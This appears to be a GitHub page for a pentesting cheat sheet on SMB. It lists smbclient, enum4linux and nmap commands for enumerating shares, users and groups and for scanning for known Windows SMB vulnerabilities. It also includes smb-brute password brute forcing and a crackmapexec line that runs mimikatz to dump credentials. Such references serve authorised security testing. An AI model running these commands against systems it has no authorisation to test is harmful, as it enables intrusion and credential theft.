forked from esp0xdeadbeef/cheat.sheets
-
Notifications
You must be signed in to change notification settings - Fork 5
/
smb.cheat
91 lines (63 loc) · 3.83 KB
/
smb.cheat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
% SMB
### This is a list of useful commands/tricks using smbclient, enum4linux and nmap smb scripts - very useful on a pentesting https://sharingsec.blogspot.com
$ target: if [[ ! -z $target ]]; then; echo $target; else echo ""; fi
# enum smb
echo 'echo "nmblookup -A <target>
smbmap -H <target>
echo exit | smbclient -L \\\\<target>\\
# List shares on a machine using NULL Session
smbclient -L <target>
# List shares on a machine using a valid <username> + <password>
smbclient -L <target> -U <username>%<password>
# Connect to a valid share with <username> + <password>
smbclient //<target>/<share> -U <username>%<password>
# List files on a specific share
smbclient //<target>/<share> -c 'ls' <password> -U <username>
# List files on a specific share folder inside the share
smbclient //<target>/<share> -c 'cd <folder>; ls' <password> -U <username>
# Download a file from a specific share folder
smbclient //<target>/<share> -c 'cd <folder>;get <desired-file-name>' <password> -U <username>
# Copy a file to a specific share folder
smbclient //<target>/<share> -c 'put <attacker file> .\<remote-file-with-backslashes>' <password> -U <username>
# Create a folder in a specific share folder
smbclient //<target>/<share> -c 'mkdir .\<remote-folder-with-backslashes>' <password> -U <username>
# Rename a file in a specific share folder
smbclient //<target>/<share> -c 'rename <current file> <new file>' <password> -U <username>
# enum4linux - General enumeration - anonymous session
enum4linux -a <target>
# enum4linux - General enumeration - authenticated session
enum4linux -u <username> -p <password> -a <target>
# enum4linux - Users enumeration
enum4linux -u <username> -p <password> -U <target>
# enum4linux - Group and members enumeration
enum4linux -u <username> -p <password> -G <target>
# enum4linux - Password policy
enum4linux -u <username> -p <password> -P <target>
# nmap - Enum Users
nmap -p 445 --script smb-enum-users <target> --script-args smbuser=<username>,smbpass=<password>,smbdomain=<smbdomain>
nmap -p 445 --script smb-enum-users <target> --script-args smbuser=<username>,smbhash=<lm:ntlm>,smbdomain=<smbdomain>
nmap --script smb-enum-users.nse --script-args smbusername=<username>,smbpass=<password>,smbdomain=workstation -p445 <target>
nmap --script smb-enum-users.nse --script-args smbusername=<username>,smbhash=<lm:ntlm>,smbdomain=<smbdomain> -p445 <target>
# nmap - Enum Groups
nmap -p 445 --script smb-enum-groups <target> --script-args smbuser=<username>,smbpass=<password>,smbdomain=<smbdomain>
nmap -p 445 --script smb-enum-groups <target> --script-args smbuser=<username>,smbhash=<lm:ntlm>,smbdomain=<smbdomain>
# nmap - Enum Shares
nmap -p 445 --script smb-enum-shares <target> --script-args smbuser=<username>,smbpass=<password>,smbdomain=<smbdomain>
nmap -p 445 --script smb-enum-shares <target> --script-args smbuser=<username>,smbpass=<lm:ntlm>,smbdomain=<smbdomain>
### nmap - OS Discovery
## nmap -p 445 --script smb-os-discovery <target>
### nmap - SMB Vulnerabilities on Windows
## nmap -p 445 --script smb-vuln-ms06-025 <target>
## nmap -p 445 --script smb-vuln-ms07-029 <target>
## nmap -p 445 --script smb-vuln-ms08-067 <target>
## nmap -p 445 --script smb-vuln-ms10-054 <target>
## nmap -p 445 --script smb-vuln-ms10-061 <target>
## nmap -p 445 --script smb-vuln-ms17-010 <target>
# nmap - SMB all vulns windows:
nmap -p 445 --script smb-vuln-ms06-025 --script smb-vuln-ms07-029 --script smb-vuln-ms08-067 --script smb-vuln-ms10-054 --script smb-vuln-ms10-061 --script smb-vuln-ms17-010 <target>
# map - Brute Force Accounts (be aware of account lockout!)
nmap –p 445 --script smb-brute –script-args userdb=<user-list.txt>,passdb=<pass-list.txt> <target>
# using mimikatz with cme
crackmapexec smb <target> -u <username> -p '<password>' -M mimikatz
# Bruteforcing with crackmapexec
crackmapexec smb <target> -u <username> -p '<password>'